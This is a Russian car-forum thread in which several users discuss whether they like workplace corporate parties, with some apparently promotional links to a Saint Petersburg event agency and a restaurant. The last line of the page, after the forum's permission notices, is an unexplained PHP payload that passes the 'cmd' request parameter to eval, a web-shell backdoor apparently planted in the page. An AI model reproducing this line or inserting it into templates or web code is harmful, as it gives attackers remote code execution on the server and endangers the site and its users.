+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Как относитесь к корпоративам


  1. #1
    Мимо проходил Dennis is on a distinguished road Аватар для Dennis
    Регистрация
    30.11.2018
    Откуда
    Россия
    Машина
    gti
    Сообщений
    16

    Как относитесь к корпоративам

    Всем привет, у меня на работе чрезмерно много активистов, постоянно устраивают корпоративы или просто посиделки после работы. Честно, не понимаю я всего этого, а когда я говорю что не пойду, то начинаются обидки, даже потом мелкие пакости коллеги делали. Прям накипело уже, вот опять сегодня собирают деньги на праздник. Вы как относитесь к этому? Посещаете?

  2. #2
    Мимо проходил Braan is on a distinguished road Аватар для Braan
    Регистрация
    26.11.2018
    Откуда
    Россия
    Машина
    gti
    Сообщений
    19
    Так это ж весело, когда коллектив общается, у нас вон все с кислыми минами сидят, иной раз даже не здороваются... грех жаловаться. Я прям завидую тем, кто рассказывает о своих корпоративных вечеринках.

  3. #3
    Мимо проходил Klon is on a distinguished road Аватар для Klon
    Регистрация
    24.11.2018
    Откуда
    World
    Машина
    WV Golf
    Сообщений
    18
    Однозначно корпоративы нужны, это помогает наладить общение между коллегами и руководством. Но всему должна быть мера, вы ведь в первую очередь не друзей пришли искать, а работать. Например мы обычно собираемся в наш профессиональный праздник на день пограничника. Причем организацией занимаются профессионалы, благо в Санкт-Петербурге есть несколько таких компаний типу такой https://msgagency.ru/services/corpor...pogranichnika/, а то в одиночку нереально устроить масштабное мероприятие.

  4. #4
    Мимо проходил Иванченко is on a distinguished road Аватар для Иванченко
    Регистрация
    25.11.2018
    Откуда
    Россия
    Машина
    Фольц
    Сообщений
    14
    Ну, посещать или не посещать корпоратив это уже дело лично каждого, у нас много народу и просто невозможно собрать всех вместе, все таки дела семейные никто не отменял, но мы все относимся к этому с понимаем. Я бы на вашем месте поговорил с коллегами и обьяснил свою позицию, что дело не в том,что вам не приятна их компания, а что у вас есть другие дела.

  5. #5
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Если честно, то я не против корпоративов, особенно если начальство оплачивает. Почему бы и не сходить на такое мероприятие. Вот, кстати, скоро нашей фирме исполняется пять лет со дня открытия, юбилей. И начальство планирует эту дату отметить с шиком, сейчас в поисках подходящего места для нашего мероприятия. Ведь в центральном районе СПб большой выбор кафе, таких, как это https://apriori-resto.ru/nashi-resto...fe-bar-venerdi . Я, между прочим, согласился пойти на корпоратив, надеюсь, будет весело.
    Последний раз редактировалось Doper; 04.02.2020 в 17:08.

+ Ответить в теме

Похожие темы

  1. Ответов: 2
    Последнее сообщение: 03.06.2019, 22:06

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}